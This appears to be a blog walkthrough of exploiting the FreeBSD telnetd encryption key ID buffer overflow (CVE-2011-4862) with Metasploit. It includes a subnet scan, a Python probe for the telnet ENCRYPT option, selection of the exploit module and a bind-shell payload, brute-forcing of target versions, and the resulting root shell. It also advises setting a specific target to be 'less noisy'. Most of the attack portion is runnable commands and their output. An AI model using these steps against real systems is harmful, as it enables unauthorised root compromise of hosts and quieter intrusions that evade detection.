hdm mentioned this here and here, but I wanted to make a note of it myself.
The first thing to do is set up the scanner module to look for vulnerable telnetd services:

msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64
THREADS => 64

Now run the scan:

msf  auxiliary(telnet_encrypt_overflow) > run
[*] 192.168.0.1:23 Does not support encryption: Netgear Embedded Telnet Server (c) 2000-2007\x0a\x0aWARNING:  Access allowed by authorized users only.\x0a\x0alogin: \x0aERROR - Your telnet client rejected our request to use char-at-a-time mode!\x0aUnable to operate under this condition.\r\x0a\x0a\x0a\x0aYour telnet session has expired due to inactivity...
[+] 192.168.0.13:23 VULNERABLE: FreeBSD/i386 () (ttyp0)\x0d\x0a\x0d\x0alogin:
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 053 of 256 hosts (020% complete)
[*] Scanned 087 of 256 hosts (033% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 196 of 256 hosts (076% complete)
[*] Scanned 213 of 256 hosts (083% complete)
[*] Scanned 224 of 256 hosts (087% complete)
[*] Scanned 235 of 256 hosts (091% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(telnet_encrypt_overflow) >

Looks like 192.168.0.13 is vulnerable, what a surprise. Note the two kinds of result: the Netgear box refused the ENCRYPT option outright ("Does not support encryption"), so it never reaches the vulnerable code path, while the FreeBSD host accepted it and failed the scanner's follow-up check.
The exploit we need here is exploit/freebsd/telnet/telnet_encrypt_keyid:
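The first decision the scanner makes is whether the remote telnetd even speaks the ENCRYPT option (RFC 2946, option 38): it sends IAC DO ENCRYPT and looks for IAC WILL ENCRYPT in the reply. The following is an added example written for this post, not the Metasploit module's code: a small telnet negotiation parser, a helper that answers that one question, and a live probe() using a plain socket. The constant names, the probe() function and the two sample replies (FREEBSD_REPLY, EMBEDDED_REPLY) are mine and are constructed, not captures from the hosts above. A WILL ENCRYPT answer is necessary but not sufficient for CVE-2011-4862, since a patched telnetd still advertises the option; the Metasploit scanner goes further before it prints VULNERABLE, and this example deliberately stops at the negotiation.

```python
"""Telnet ENCRYPT option check (added example, not the Metasploit scanner)."""
import socket

# Telnet protocol constants (RFC 854 commands, RFC 2946 ENCRYPT option).
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
OPT_ECHO = 1
OPT_ENCRYPT = 38


def build_probe() -> bytes:
    """IAC DO ENCRYPT: ask the server to turn on encryption on its side."""
    return bytes([IAC, DO, OPT_ENCRYPT])


def parse_negotiation(data: bytes):
    """Split a raw telnet read into (plain_text, [(verb, option), ...]).

    Walks IAC sequences and skips suboption payloads (IAC SB ... IAC SE),
    so a login banner mixed with option negotiation decodes correctly.
    A suboption is recorded as (SB, option) so callers can see it was sent.
    """
    text = bytearray()
    commands = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if i + 1 >= n:
            break                                   # truncated IAC at end
        cmd = data[i + 1]
        if cmd == IAC:                              # escaped literal 0xff
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= n:
                break                               # truncated option byte
            commands.append((cmd, data[i + 2]))
            i += 3
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break                               # unterminated suboption
            sub = data[i + 2:end]
            commands.append((SB, sub[0] if sub else None))
            i = end + 2
        else:
            i += 2                                  # NOP, GA, AYT, ...
    return bytes(text), commands


def supports_encryption(data: bytes) -> bool:
    """True if the reply to our probe contains IAC WILL ENCRYPT."""
    _, commands = parse_negotiation(data)
    return (WILL, OPT_ENCRYPT) in commands


def probe(host: str, port: int = 23, timeout: float = 5.0) -> bool:
    """Live check (network only): connect, send the probe, read until the
    server answers WILL ENCRYPT, closes, or `timeout` seconds pass."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        s.sendall(build_probe())
        buf = b""
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
                if supports_encryption(buf):
                    return True
        except socket.timeout:
            pass
        return supports_encryption(buf)


# Constructed sample replies (assumed shapes, not captures from the post).
FREEBSD_REPLY = (
    bytes([IAC, WILL, OPT_ENCRYPT]) + bytes([IAC, DO, OPT_ECHO])
    + b"FreeBSD/i386 () (ttyp0)\r\n\r\nlogin: "
)
EMBEDDED_REPLY = (
    b"Netgear Embedded Telnet Server\r\n"
    + bytes([IAC, WONT, OPT_ENCRYPT]) + bytes([IAC, DO, OPT_ECHO])
)

if __name__ == "__main__":
    for name, reply in (("freebsd", FREEBSD_REPLY), ("embedded", EMBEDDED_REPLY)):
        print(name, "advertises ENCRYPT:", supports_encryption(reply))
```

Run it against a lab host with probe("192.168.0.13") to get the same yes/no the scanner prints as "Does not support encryption"; anything that answers WILL ENCRYPT is worth handing to the Metasploit module for the real check.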

msf  exploit(telnet_encrypt_keyid) > info

       Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow
     Module: exploit/freebsd/telnet/telnet_encrypt_keyid
    Version: 0
   Platform: BSD
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  Jaime Penalba Estebanez <jpenalbae@gmail.com>
  Brandon Perry <bperry.volatile@gmail.com>
  Dan Rosenberg
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOST                      yes       The target address
  RPORT     23               yes       The target port
  USERNAME                   no        The username to authenticate as

Payload information:
  Space: 128
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in the encryption option
  handler of the FreeBSD telnet service.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-4862
  http://www.osvdb.org/78020
  http://www.securityfocus.com/bid/51182
  http://www.exploit-db.com/exploits/18280/

msf  exploit(telnet_encrypt_keyid) >

The payload space is limited to 128 bytes (with one bad character to avoid), so only a few payloads fit; a shell is more than enough though!

msf  exploit(telnet_encrypt_keyid) > show payloads

Compatible Payloads
===================

   Name                        Disclosure Date  Rank    Description
   ----                        ---------------  ----    -----------
   bsd/x86/exec                                 normal  BSD Execute Command
   bsd/x86/metsvc_bind_tcp                      normal  FreeBSD Meterpreter Service, Bind TCP
   bsd/x86/metsvc_reverse_tcp                   normal  FreeBSD Meterpreter Service, Reverse TCP Inline
   bsd/x86/shell/bind_tcp                       normal  BSD Command Shell, Bind TCP Stager
   bsd/x86/shell/reverse_tcp                    normal  BSD Command Shell, Reverse TCP Stager
   bsd/x86/shell_bind_tcp                       normal  BSD Command Shell, Bind TCP Inline
   bsd/x86/shell_reverse_tcp                    normal  BSD Command Shell, Reverse TCP Inline
   generic/custom                               normal  Custom Payload
   generic/debug_trap                           normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                           normal  Generic x86 Tight Loop

We’ll select bsd/x86/shell/bind_tcp to make things quick.

msf  exploit(telnet_encrypt_keyid) > set payload bsd/x86/shell/bind_tcp
payload => bsd/x86/shell/bind_tcp
msf  exploit(telnet_encrypt_keyid) > set rhost 192.168.0.13
rhost => 192.168.0.13

And now to exploit. Note that with the default Automatic target it brute-forces every version target in turn, from FreeBSD 8.2 down to 5.3, sending two payloads per attempt until one of them yields a session:

msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Brute forcing with 9 possible targets
[*] Trying target FreeBSD 8.2...
[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 8.1...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 8.0...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 7.3/7.4...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 7.0/7.1/7.2...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 6.3/6.4...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 6.0/6.1/6.2...
[*] Sending first payload
[*] Sending second payload...
[*] Trying target FreeBSD 5.5...
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Sending first payload
[*] Command shell session 1 opened (192.168.0.8:41452 -> 192.168.0.13:4444) at 2012-01-18 11:01:05 -0500
[*] Sending second payload...

Looks like we got a shell. Watch the interleaving in the output above: the stage and the "session 1 opened" line print just after "Trying target FreeBSD 5.5...", but the bind handler connected to a port opened by the payloads sent for the FreeBSD 6.0/6.1/6.2 attempt (target 7), which is the target used explicitly further down.

msf  exploit(telnet_encrypt_keyid) > sessions -i 1
[*] Starting interaction with 1...

whoami
root

To be less noisy you could set the target to the specific version of FreeBSD you're attacking, which sends a single pair of payloads instead of walking the whole list:

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3
msf  exploit(telnet_encrypt_keyid) > set target 7
target => 7
msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload...
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Command shell session 2 opened (192.168.0.8:48865 -> 192.168.0.13:4444) at 2012-01-18 11:03:55 -0500
sessions -l

Active sessions
===============

  Id  Type       Information  Connection
  --  ----       -----------  ----------
  2   shell bsd               192.168.0.8:48865 -> 192.168.0.13:4444
